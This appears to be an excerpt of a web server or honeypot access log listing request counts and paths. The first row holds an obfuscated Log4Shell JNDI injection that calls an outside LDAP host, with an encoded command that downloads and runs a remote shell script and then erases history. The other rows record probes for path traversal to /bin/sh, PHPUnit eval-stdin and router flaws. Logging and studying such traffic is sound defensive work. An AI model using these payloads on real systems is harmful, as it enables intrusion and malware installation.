1 | GET | /solr/admin/collections?action=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=%7D%27)&wt=json | HTTP/1.1 |
1 | GET | /start.js | HTTP/1.1 |
1 | GET | /sws/data/sws_data.js | HTTP/1.1 |
1 | GET | /this_server/all_settings.shtml | HTTP/1.1 |
1 | GET | /tmui/ | HTTP/1.1 |
1 | GET | /upnp/BasicDevice.xml | HTTP/1.1 |
1 | GET | /wavemaster.internal | HTTP/1.1 |
1 | GET | /wcd/system.xml | HTTP/1.1 |
1 | GET | /xmldata?item=All | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
2 | POST | /HNAP1/ | HTTP/1.0 |
3 | POST | /HNAP1/ | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | VYZMFY | / | HTTP/1.1 |